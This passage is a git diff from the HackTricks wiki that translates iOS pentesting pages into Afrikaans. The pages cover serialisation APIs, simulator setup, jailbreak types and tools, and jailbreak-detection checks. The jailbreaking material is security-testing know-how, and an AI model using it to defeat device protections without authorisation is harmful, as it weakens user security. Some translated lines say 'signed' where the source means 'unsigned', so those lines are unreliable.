Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
- - diff --git a/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md b/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md index 19e9f14ee..dfa9021ee 100644 --- a/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md +++ b/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md @@ -1,21 +1,19 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-# WebView Protocol Handlers +# WebView-protokolhanteraars @@ -23,16 +21,14 @@ Other ways to support HackTricks:
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md b/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md index 24a7239aa..af119f47f 100644 --- a/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md +++ b/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md @@ -1,98 +1,86 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-Code and more information in [https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence](https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence). +Kode en meer inligting in [https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence](https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence). -## Object Serialization in iOS Development +## Objekserialisering in iOS-ontwikkeling -In iOS, **object serialization** involves converting objects into a format that can be easily stored or transmitted, and then reconstructing them from this format when needed. Two main protocols, **`NSCoding`** and **`NSSecureCoding`**, facilitate this process for Objective-C or `NSObject` subclasses, allowing objects to be serialized into **`NSData`**, a format that wraps byte buffers. - -### **`NSCoding`** Implementation -To implement `NSCoding`, a class must inherit from `NSObject` or be marked as `@objc`. This protocol mandates the implementation of two methods for encoding and decoding instance variables: +In iOS behels **objekserialisering** die omskakeling van objekte na 'n formaat wat maklik gestoor of oorgedra kan word, en dan die herkonstruksie daarvan uit hierdie formaat wanneer dit nodig is. Twee hoofprotokolle, **`NSCoding`** en **`NSSecureCoding`**, fasiliteer hierdie proses vir Objective-C of `NSObject` subklasse, wat objekte kan serialiseer na **`NSData`**, 'n formaat wat bytebuffers omhul. +### **`NSCoding`**-implementering +Om `NSCoding` te implementeer, moet 'n klas van `NSObject` erf of gemerk word as `@objc`. Hierdie protokol vereis die implementering van twee metodes vir die enkodeer en dekodeer van instansie-variables: ```swift class CustomPoint: NSObject, NSCoding { - var x: Double = 0.0 - var name: String = "" +var x: Double = 0.0 +var name: String = "" - func encode(with aCoder: NSCoder) { - aCoder.encode(x, forKey: "x") - aCoder.encode(name, forKey: "name") - } +func encode(with aCoder: NSCoder) { +aCoder.encode(x, forKey: "x") +aCoder.encode(name, forKey: "name") +} - required convenience init?(coder aDecoder: NSCoder) { - guard let name = aDecoder.decodeObject(forKey: "name") as? String else { return nil } - self.init(x: aDecoder.decodeDouble(forKey: "x"), name: name) - } +required convenience init?(coder aDecoder: NSCoder) { +guard let name = aDecoder.decodeObject(forKey: "name") as? String else { return nil } +self.init(x: aDecoder.decodeDouble(forKey: "x"), name: name) +} } ``` - -### **Enhancing Security with `NSSecureCoding`** -To mitigate vulnerabilities where attackers inject data into already constructed objects, **`NSSecureCoding`** offers an enhanced protocol. Classes conforming to `NSSecureCoding` must verify the type of objects during decoding, ensuring that only the expected object types are instantiated. However, it's crucial to note that while `NSSecureCoding` enhances type safety, it doesn't encrypt data or ensure its integrity, necessitating additional measures for protecting sensitive information: - +### **Verbetering van veiligheid met `NSSecureCoding`** +Om kwetsbaarheden te verminder waar aanvallers data in reeds geconstrueerde objekte inspuit, bied **`NSSecureCoding`** 'n verbeterde protokol. Klasse wat voldoen aan `NSSecureCoding` moet die tipe van objekte verifieer tydens dekodering, om te verseker dat slegs die verwagte objek tipes geïnstantieer word. Dit is egter belangrik om op te let dat terwyl `NSSecureCoding` tipe veiligheid verbeter, dit nie data enkripsie of die versekering van integriteit verseker nie, en dus addisionele maatreëls nodig is om sensitiewe inligting te beskerm: ```swift static var supportsSecureCoding: Bool { - return true +return true } let obj = decoder.decodeObject(of: MyClass.self, forKey: "myKey") ``` - -## Data Archiving with `NSKeyedArchiver` -`NSKeyedArchiver` and its counterpart, `NSKeyedUnarchiver`, enable encoding objects into a file and later retrieving them. This mechanism is useful for persisting objects: - +## Data-argivering met `NSKeyedArchiver` +`NSKeyedArchiver` en sy eweknie, `NSKeyedUnarchiver`, maak dit moontlik om voorwerpe in 'n lêer te enkodeer en later te herwin. Hierdie meganisme is nuttig vir die volharding van voorwerpe: ```swift NSKeyedArchiver.archiveRootObject(customPoint, toFile: "/path/to/archive") let customPoint = NSKeyedUnarchiver.unarchiveObjectWithFile("/path/to/archive") as? CustomPoint ``` - -### Using `Codable` for Simplified Serialization -Swift's `Codable` protocol combines `Decodable` and `Encodable`, facilitating the encoding and decoding of objects like `String`, `Int`, `Double`, etc., without extra effort: - +### Gebruik van `Codable` vir Vereenvoudigde Serialisering +Swift se `Codable` protokol kombineer `Decodable` en `Encodable`, wat die enkodering en dekodering van voorwerpe soos `String`, `Int`, `Double`, ens., sonder ekstra moeite fasiliteer: ```swift struct CustomPointStruct: Codable { - var x: Double - var name: String +var x: Double +var name: String } ``` +Hierdie benadering ondersteun reguit serialisering na en vanaf eiendomlyste en JSON, wat datahantering in Swift-toepassings verbeter. -This approach supports straightforward serialization to and from property lists and JSON, enhancing data handling in Swift applications. +## JSON en XML-koderingsalternatiewe +Afgesien van ingeboude ondersteuning, bied verskeie derdeparty biblioteke JSON- en XML-kodering/ontkodering, elk met sy eie prestasiekenmerke en veiligheidsoorwegings. Dit is noodsaaklik om hierdie biblioteke sorgvuldig te kies, veral om kwesbaarhede soos XXE (XML External Entities) aanvalle te verminder deur ontleders te konfigureer om eksterne entiteitsverwerking te voorkom. -## JSON and XML Encoding Alternatives -Beyond native support, several third-party libraries offer JSON and XML encoding/decoding capabilities, each with its own performance characteristics and security considerations. It's imperative to carefully select these libraries, especially to mitigate vulnerabilities like XXE (XML External Entities) attacks by configuring parsers to prevent external entity processing. - -### Security Considerations -When serializing data, especially to the file system, it's essential to be vigilant about the potential inclusion of sensitive information. Serialized data, if intercepted or improperly handled, can expose applications to risks such as unauthorized actions or data leakage. Encrypting and signing serialized data is recommended to enhance security. +### Veiligheidsoorwegings +Wanneer data geserialiseer word, veral na die lêersisteem, is dit noodsaaklik om waaksaam te wees oor die moontlike insluiting van sensitiewe inligting. Geserialiseerde data, as dit onderskep of verkeerd hanteer word, kan toepassings blootstel aan risiko's soos ongemagtigde aksies of datalekke. Dit word aanbeveel om geserialiseerde data te versleutel en te onderteken om die veiligheid te verbeter. -## References +## Verwysings * [https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence](https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
- - diff --git a/mobile-pentesting/ios-pentesting/ios-testing-environment.md b/mobile-pentesting/ios-pentesting/ios-testing-environment.md index 6835f7f4f..ebb617817 100644 --- a/mobile-pentesting/ios-pentesting/ios-testing-environment.md +++ b/mobile-pentesting/ios-pentesting/ios-testing-environment.md @@ -1,151 +1,149 @@ -# iOS Testing Environment +# iOS Toetsomgewing
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## Apple Developer Program +## Apple Ontwikkelaarprogram -A **provisioning identity** is a collection of public and private keys that are associated an Apple developer account. In order to **sign apps** you need to pay **99$/year** to register in the **Apple Developer Program** to get your provisioning identity. Without this you won't be able to run applications from the source code in a physical device. Another option to do this is to use a **jailbroken device**. +'n **voorsieningsidentiteit** is 'n versameling openbare en private sleutels wat verband hou met 'n Apple-ontwikkelaarsrekening. Om **toepassings te onderteken**, moet jy **99$/jaar** betaal om te registreer vir die **Apple Ontwikkelaarprogram** om jou voorsieningsidentiteit te kry. Sonder dit sal jy nie in staat wees om programme vanuit die bronkode op 'n fisiese toestel uit te voer nie. 'n Ander opsie om dit te doen, is om 'n **gejailbreakte toestel** te gebruik. -Starting in Xcode 7.2 Apple has provided an option to create a **free iOS development provisioning profile** that allows to write and test your application on a real iPhone. Go to _Xcode_ --> _Preferences_ --> _Accounts_ --> _+_ (Add new Appli ID you your credentials) --> _Click on the Apple ID created_ --> _Manage Certificates_ --> _+_ (Apple Development) --> _Done_\ -\_\_Then, in order to run your application in your iPhone you need first to **indicate the iPhone to trust the computer.** Then, you can try to **run the application in the mobile from Xcode,** but and error will appear. So go to _Settings_ --> _General_ --> _Profiles and Device Management_ --> Select the untrusted profile and click "**Trust**". +Vanaf Xcode 7.2 het Apple 'n opsie verskaf om 'n **gratis iOS-ontwikkelingsvoorsieningsprofiel** te skep wat dit moontlik maak om jou toepassing op 'n werklike iPhone te skryf en te toets. Gaan na _Xcode_ --> _Voorkeure_ --> _Rekeninge_ --> _+_ (Voeg nuwe Appli ID by jou geloofsbriewe) --> _Klik op die geskepte Apple ID_ --> _Bestuur Sertifikate_ --> _+_ (Apple Ontwikkeling) --> _Klaar_\ +\_\_Daarna moet jy die iPhone eers **aandui dat dit die rekenaar moet vertrou** voordat jy die toepassing op die iPhone kan probeer uitvoer vanuit Xcode. Gaan na _Instellings_ --> _Algemeen_ --> _Profiel en toestelbestuur_ --> Kies die onvertroue profiel en klik "**Vertrou**". -Note that **applications signed by the same signing certificate can share resources on a secure manner, like keychain items**. +Let daarop dat **toepassings wat deur dieselfde ondertekeningssertifikaat onderteken is, hulpbronne op 'n veilige manier kan deel, soos sleutelkettingitems**. -The provisioning profiles are stored inside the phone in **`/Library/MobileDevice/ProvisioningProfiles`** +Die voorsieningsprofiel word binne die telefoon gestoor in **`/Library/MobileDevice/ProvisioningProfiles`** ## **Simulator** {% hint style="info" %} -Note that a **simulator isn't the same as en emulator**. The simulator just simulates the behaviour of the device and functions but don't actually use them. +Let daarop dat 'n **simulator nie dieselfde as 'n emulator** is nie. Die simulator boots net die gedrag van die toestel en funksies na, maar gebruik dit nie werklik nie. {% endhint %} ### **Simulator** -The first thing you need to know is that **performing a pentest inside a simulator will much more limited than doing it in a jailbroken device**. +Die eerste ding wat jy moet weet, is dat 'n **pentest in 'n simulator baie beperkter sal wees as om dit in 'n gejailbreakte toestel te doen**. -All the tools required to build and support an iOS app are **only officially supported on Mac OS**.\ -Apple's de facto tool for creating/debugging/instrumenting iOS applications is **Xcode**. It can be used to download other components such as **simulators** and different **SDK** **versions** required to build and **test** your app.\ -It's highly recommended to **download** Xcode from the **official app store**. Other versions may be carrying malware. +Alle gereedskap wat nodig is om 'n iOS-toepassing te bou en te ondersteun, word **slegs amptelik ondersteun op Mac OS**.\ +Apple se de facto gereedskap vir die skep/debuut/instrumentering van iOS-toepassings is **Xcode**. Dit kan gebruik word om ander komponente soos **simulators** en verskillende **SDK-**weergawes wat nodig is om jou toepassing te bou en te **toets**, af te laai.\ +Dit word sterk aanbeveel om Xcode van die **amptelike app store** af te laai. Ander weergawes kan malware dra. -The simulator files can be found in `/Users//Library/Developer/CoreSimulator/Devices` +Die simulatorlêers kan gevind word in `/Users//Library/Developer/CoreSimulator/Devices` -To open the simulator, run Xcode, then press in the _Xcode tab_ --> _Open Developer tools_ --> _Simulator_\ -\_\_In the following image clicking in "iPod touch \[...]" you can select other device to test in: +Om die simulator oop te maak, voer Xcode uit en druk dan op die _Xcode-tabblad_ --> _Open Developer Tools_ --> _Simulator_\ +\_\_In die volgende prentjie kan jy deur op "iPod touch \[...]" te klik, 'n ander toestel kies om te toets: ![](<../../.gitbook/assets/image (457).png>) ![](<../../.gitbook/assets/image (458).png>) -### Applications in the Simulator - -Inside `/Users//Library/Developer/CoreSimulator/Devices` you may find all the **installed simulators**. If you want to access the files of an application created inside one of the emulators it might be difficult to know **in which one the app is installed**. A quick way to **find the correct UID** is to execute the app in the simulator and execute: +### Toepassings in die Simulator +Binne `/Users//Library/Developer/CoreSimulator/Devices` kan jy al die **geïnstalleerde simulators** vind. As jy die lêers van 'n toepassing wat binne een van die simulators geskep is, wil bereik, kan dit moeilik wees om te weet **in watter een die toepassing geïnstalleer is**. 'n Vinnige manier om die korrekte UID te vind, is om die toepassing in die simulator uit te voer en die volgende uit te voer: ```bash xcrun simctl list | grep Booted - iPhone 8 (BF5DA4F8-6BBE-4EA0-BA16-7E3AFD16C06C) (Booted) +iPhone 8 (BF5DA4F8-6BBE-4EA0-BA16-7E3AFD16C06C) (Booted) ``` +Sodra jy die UID weet, kan die geïnstalleerde programme binne dit gevind word in `/Users//Library/Developer/CoreSimulator/Devices/{UID}/data/Containers/Data/Application` -Once you know the UID the apps installed within it can be found in `/Users//Library/Developer/CoreSimulator/Devices/{UID}/data/Containers/Data/Application` +Egter, verrassend genoeg sal jy die toepassing nie hier vind nie. Jy moet toegang verkry tot `/Users//Library/Developer/Xcode/DerivedData/{Application}/Build/Products/Debug-iphonesimulator/` -However, surprisingly you won't find the application here. You need to access `/Users//Library/Developer/Xcode/DerivedData/{Application}/Build/Products/Debug-iphonesimulator/` - -And in this folder you can **find the package of the application.** +En in hierdie vouer kan jy **die pakkie van die toepassing vind.** ## Emulator -Corellium is the only publicly available iOS emulator. It is an enterprise SaaS solution with a per user license model and does not offer any trial license. +Corellium is die enigste openlik beskikbare iOS-emulator. Dit is 'n onderneming SaaS-oplossing met 'n lisensiemodel per gebruiker en bied geen proeftydperk lisensie aan nie. -## Jailbeaking +## Jailbreaking -Apple strictly requires that the code running on the iPhone must be **signed by a certificate issued by Apple**. **Jailbreaking** is the process of actively **circumventing such restrictions** and other security controls put in places by the OS. Therefore, once the device is jailbroken, the **integrity check** which is responsible for checking apps being installed is patched so it is **bypassed**. +Apple vereis streng dat die kode wat op die iPhone loop, **onderteken moet word deur 'n sertifikaat wat deur Apple uitgereik is**. **Jailbreaking** is die proses om aktief **sodanige beperkings** en ander sekuriteitsbeheermaatreëls wat deur die OS ingestel is, te omseil. Daarom, sodra die toestel gejailbreak is, word die **integriteitskontrole** wat verantwoordelik is vir die kontrole van geïnstalleerde programme, gepatch sodat dit **omseil** word. {% hint style="info" %} -Unlike Android, **you cannot switch to "Developer Mode"** in iOS to run unsigned/untrusted code on the device. +In teenstelling met Android, **kan jy nie oorskakel na "Ontwikkelaarsmodus"** in iOS om ondertekende/ongeverifieerde kode op die toestel uit te voer nie. {% endhint %} ### Android Rooting vs. iOS Jailbreaking -While often compared, **rooting** on Android and **jailbreaking** on iOS are fundamentally different processes. Rooting Android devices might involve **installing the `su` binary** or **replacing the system with a rooted custom ROM**, which doesn't necessarily require exploits if the bootloader is unlocked. **Flashing custom ROMs** replaces the device's OS after unlocking the bootloader, sometimes requiring an exploit. +Alhoewel dit dikwels vergelyk word, is **rooting** op Android en **jailbreaking** op iOS fundamenteel verskillende prosesse. Rooting van Android-toestelle mag die **installeer van die `su` binêre lêer** of die **vervang van die stelsel met 'n geroote aangepaste ROM** behels, wat nie noodwendig exploits vereis as die bootloader ontgrendel is nie. **Flashing van aangepaste ROMs** vervang die toestel se bedryfstelsel nadat die bootloader ontgrendel is, en vereis soms 'n exploit. -In contrast, iOS devices cannot flash custom ROMs due to the bootloader's restriction to only boot Apple-signed images. **Jailbreaking iOS** aims to bypass Apple's code signing protections to run unsigned code, a process complicated by Apple's continuous security enhancements. +In teenstelling hiermee kan iOS-toestelle nie aangepaste ROMs flash nie as gevolg van die bootloader se beperking om slegs Apple-ondertekende beelde te laai. **Jailbreaking van iOS** het ten doel om Apple se kode-ondertekeningsbeskerming te omseil om ondertekende kode uit te voer, 'n proses wat gekompliseer word deur Apple se voortdurende sekuriteitsverbeterings. -### Jailbreaking Challenges +### Uitdagings met Jailbreaking -Jailbreaking iOS is increasingly difficult as Apple patches vulnerabilities quickly. **Downgrading iOS** is only possible for a limited time after a release, making jailbreaking a time-sensitive matter. Devices used for security testing should not be updated unless re-jailbreaking is guaranteed. +Jailbreaking van iOS word toenemend moeilik aangesien Apple kwetsbaarhede vinnig patch. **Aftrekking van iOS** is slegs moontlik vir 'n beperkte tydperk na 'n vrystelling, wat jailbreaking 'n tydsensitiewe aangeleentheid maak. Toestelle wat vir sekuriteitstoetsing gebruik word, moet nie opgedateer word tensy herjailbreaking gewaarborg is nie. -iOS updates are controlled by a **challenge-response mechanism** (SHSH blobs), allowing installation only for Apple-signed responses. This mechanism, known as a "signing window", limits the ability to store and later use OTA firmware packages. The [IPSW Downloads website](https://ipsw.me) is a resource for checking current signing windows. +iOS-opdaterings word beheer deur 'n **uitdaging-responsmeganisme** (SHSH blobs), wat slegs die installasie van Apple-ondertekende responsies toelaat. Hierdie meganisme, bekend as 'n "ondertekeningsvenster", beperk die vermoë om OTA-firmwarepakette te stoor en later te gebruik. Die [IPSW Downloads-webwerf](https://ipsw.me) is 'n bron vir die nagaan van die huidige ondertekeningsvensters. -### Jailbreak Varieties +### Verskillende Jailbreak-variëteite -- **Tethered jailbreaks** require a computer connection for each reboot. -- **Semi-tethered jailbreaks** allow booting into non-jailbroken mode without a computer. -- **Semi-untethered jailbreaks** require manual re-jailbreaking without needing a computer. -- **Untethered jailbreaks** offer a permanent jailbreak solution without the need for re-application. +- **Tethered jailbreaks** vereis 'n rekenaarkoppeling vir elke herlaai. +- **Semi-tethered jailbreaks** maak dit moontlik om in nie-gejailbreakte modus te herlaai sonder 'n rekenaar. +- **Semi-untethered jailbreaks** vereis handmatige herjailbreaking sonder 'n rekenaar. +- **Untethered jailbreaks** bied 'n permanente jailbreak-oplossing sonder die behoefte aan heraanwending. -### Jailbreaking Tools and Resources +### Jailbreaking-hulpmiddels en -hulpbronne -Jailbreaking tools vary by iOS version and device. Resources such as [Can I Jailbreak?](https://canijailbreak.com), [The iPhone Wiki](https://www.theiphonewiki.com), and [Reddit Jailbreak](https://www.reddit.com/r/jailbreak/) provide up-to-date information. Examples include: +Jailbreaking-hulpmiddels verskil volgens die iOS-weergawe en toestel. Hulpbronne soos [Can I Jailbreak?](https://canijailbreak.com), [The iPhone Wiki](https://www.theiphonewiki.com) en [Reddit Jailbreak](https://www.reddit.com/r/jailbreak/) bied opgedateerde inligting. Voorbeelde sluit in: -- [Checkra1n](https://checkra.in/) for A7-A11 chip devices. -- [Palera1n](https://palera.in/) for Checkm8 devices (A8-A11) on iOS 15.0-16.5. -- [Unc0ver](https://unc0ver.dev/) for iOS versions up to 14.8. +- [Checkra1n](https://checkra.in/) vir A7-A11 chip-toestelle. +- [Palera1n](https://palera.in/) vir Checkm8-toestelle (A8-A11) op iOS 15.0-16.5. +- [Unc0ver](https://unc0ver.dev/) vir iOS-weergawes tot 14.8. -Modifying your device carries risks, and jailbreaking should be approached with caution. +Die wysiging van jou toestel dra risiko's, en jailbreaking moet met omsigtigheid benader word. -### Jailbreaking Benefits and Risks +### Voordele en Risiko's van Jailbreaking -Jailbreaking **removes OS-imposed sandboxing**, allowing apps to access the entire filesystem. This freedom enables the installation of unapproved apps and access to more APIs. However, for regular users, jailbreaking is **not recommended** due to potential security risks and device instability. +Jailbreaking **verwyder die deur die OS opgelegde sandboksing**, wat dit vir programme moontlik maak om toegang tot die hele lêersisteem te verkry. Hierdie vryheid maak die installasie van nie-goedgekeurde programme en toegang tot meer API's moontlik. Vir gewone gebruikers word jailbreaking egter **nie aanbeveel nie** as gevolg van potensiële sekuriteitsrisiko's en toestel-onstabiliteit. -### **After Jailbreaking** +### **Na Jailbreaking** {% content-ref url="basic-ios-testing-operations.md" %} [basic-ios-testing-operations.md](basic-ios-testing-operations.md) {% endcontent-ref %} -### **Jailbreak Detection** +### **Jailbreak-opsporing** -**Several applications will try to detect if the mobile is jailbroken and in that case the application won't run** +**Verskeie programme sal probeer om vas te stel of die mobiele toestel gejailbreak is, en in daardie geval sal die toepassing nie uitgevoer word nie** -* After jailbreaking an iOS **files and folders are usually installed**, these can be searched to determine if the device is jailbroken. -* In a jailbroken device applications get **read/write access to new files** outside the sandbox -* Some **API** **calls** will **behave differently** -* The presence of the **OpenSSH** service -* Calling `/bin/sh` will **return 1** instead of 0 +* Nadat iOS gejailbreak is, word **lêers en vouers gewoonlik geïnstalleer**, en dit kan ondersoek word om vas te stel of die toestel gejailbreak is. +* Op 'n gejailbreakte toestel kry programme **lees-/skryftoegang tot nuwe lêers** buite die sandboks. +* Sommige **API-oproepe** sal **anders optree**. +* Die teenwoordigheid van die **OpenSSH-diens** +* Die aanroep van `/bin/sh` sal **1 teruggee** in plaas van 0 -**More information about how to detect jailbreaking** 